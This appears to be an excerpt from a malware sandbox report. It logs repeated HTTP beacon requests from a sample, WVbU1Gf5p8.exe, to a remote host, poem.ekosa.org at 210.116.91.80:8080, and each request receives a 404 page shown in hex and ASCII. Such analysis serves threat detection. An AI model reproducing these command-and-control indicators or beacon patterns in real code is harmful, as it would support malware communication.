      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:33.791635990 CET5188INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:33 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      167192.168.2.449947210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:34.059333086 CET5188OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:34.320563078 CET5189INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:33 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      168192.168.2.449948210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:34.716017008 CET5189OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:34.985666990 CET5190INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:34 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      169192.168.2.449949210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:35.254631042 CET5191OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:35.514945984 CET5191INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:34 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      17192.168.2.449781210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:06.434833050 CET298OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:06.696373940 CET298INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:06 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      170192.168.2.449950210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:35.783725977 CET5192OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:36.047019005 CET5193INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:35 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      171192.168.2.449951210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:36.432792902 CET5193OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:36.702572107 CET5194INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:35 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      172192.168.2.449952210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:36.969227076 CET5194OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:37.230433941 CET5195INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:37 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      173192.168.2.449953210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:37.518347025 CET5196OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:37.779186964 CET5196INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:37 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      174192.168.2.449954210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:38.169698954 CET5197OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:38.439538956 CET5197INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:38 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      175192.168.2.449955210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:38.710355997 CET5198OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:38.972512007 CET5199INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:38 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
